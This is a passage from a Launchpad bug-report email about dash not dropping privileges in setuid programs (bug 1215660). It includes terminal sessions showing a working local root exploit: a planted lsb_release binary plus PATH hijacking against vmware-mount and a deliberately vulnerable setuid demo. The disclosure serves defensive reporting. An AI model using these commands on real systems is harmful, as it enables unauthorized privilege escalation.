  write without a vulnerability in it.

  Ensure /bin/sh is dash
  antarus@goats5 ~ $ sudo ln -sf /bin/dash /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(sh`tty` 
21);}';PATH=.:$PATH vmware-mount
  # whoami   
  root

  If we switched to a sane shell (like busybox for example.)
  antarus@goats5 ~ $ sudo ln -sf /bin/busybox /bin/sh
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(/bin/sh`tty` 
21);}';PATH=.:$PATH vmware-mount

  BusyBox v1.18.5 (Ubuntu 1:1.18.5-1ubuntu4.1) built-in shell (ash)
  Enter 'help' for a list of built-in commands.

  /usr/local/google/home/antarus $ whoami
  whoami: unknown uid X # I have omitted my actual UID, needless to say it 
isn't uid 0 :)

  Now you may be saying 'hey i don't have vmware-mount handy' so
  instead:

  antarus@goats5 ~ $ cat /tmp/silly_setuid.c 
  #include stdio.h

  int main(int argc, char ** argv) {
popen(lsb_release, r);
  }

  antarus@goats5 ~ $ gcc /tmp/silly_setuid.c -o silly_setuid
  antarus@goats5 ~ $ sudo chown root:root silly_setuid 
  [sudo] password for antarus: 
  antarus@goats5 ~ $ sudo chmod 4755 silly_setuid 
  antarus@goats5 ~ $ cc -xc - -olsb_release'main(){system(whoami`tty` 
21);}';PATH=.:$PATH silly_setuid
  antarus@goats5 ~ $ root

  Distributor ID: Ubuntu
  Description:Ubuntu 12.04.1 LTS
  Release:12.04
  Codename:   precise

  antarus@goats5 ~ $ apt-cache policy dash
  dash:
Installed: 0.5.7-2ubuntu2
Candidate: 0.5.7-2ubuntu2
Version table:
   *** 0.5.7-2ubuntu2 0
  600 my-apt-mirror ubuntu-precise/main amd64 Packages
  100 /var/lib/dpkg/status

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/dash/+bug/1215660/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   :

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 1926265] Re: slapd enter in infinite loop on sched_yield syscall

[Touch-packages] [Bug 827151] Re: Annoying log message "DIGEST-MD5 common mech free"

[Touch-packages] [Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

[Touch-packages] [Bug 1215660] Re: dash does not drop privileges when euid != uid, this can cause local root exploits when setuid programs use system() or popen()

11 matches

Site Navigation

Mail list logo

Footer information